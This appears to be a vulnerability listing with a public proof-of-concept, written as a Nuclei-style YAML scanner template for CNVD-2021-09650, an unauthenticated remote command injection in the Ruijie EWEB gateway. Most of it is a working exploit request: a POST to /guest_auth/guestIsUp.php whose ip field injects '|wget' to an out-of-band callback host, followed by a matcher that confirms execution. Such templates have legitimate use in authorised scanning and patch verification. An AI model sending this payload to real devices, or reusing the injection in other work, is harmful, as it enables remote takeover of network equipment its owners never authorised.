漏洞描述
Ruijie EWEB Gateway Platform is susceptible to remote command injection attacks.
CNVD-2021-09650: Ruijie Networks-EWEB Network Management System - Remote Code Execution
PoC代码[已公开]
id: CNVD-2021-09650
info:
name: Ruijie Networks-EWEB Network Management System - Remote Code Execution
author: daffainfo,pikpikcu
severity: critical
description: Ruijie EWEB Gateway Platform is susceptible to remote command injection attacks.
reference:
- http://j0j0xsec.top/2021/04/22/%E9%94%90%E6%8D%B7EWEB%E7%BD%91%E5%85%B3%E5%B9%B3%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/
- https://github.com/yumusb/EgGateWayGetShell_py/blob/main/eg.py
- https://www.ruijienetworks.com
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cwe-id: CWE-77
metadata:
max-request: 1
tags: cnvd,cnvd2021,ruijie,rce
http:
- raw:
- |
POST /guest_auth/guestIsUp.php HTTP/1.1
Host: {{Hostname}}
mac=1&ip=127.0.0.1|wget {{interactsh-url}}
unsafe: true
matchers:
- type: word
part: interactsh_protocol
name: http
words:
- "http"
# digest: 490a004630440220534a796db57d3e437a316e7909445f465bfa46c5bed6d027bb25900e9d8ec0bc0220476821fc2f70492471c6d1c948ae467b2e3ac16f9fd606250c6b8f4fd0c217ed:922c64590222798bb761d5b6d8e72950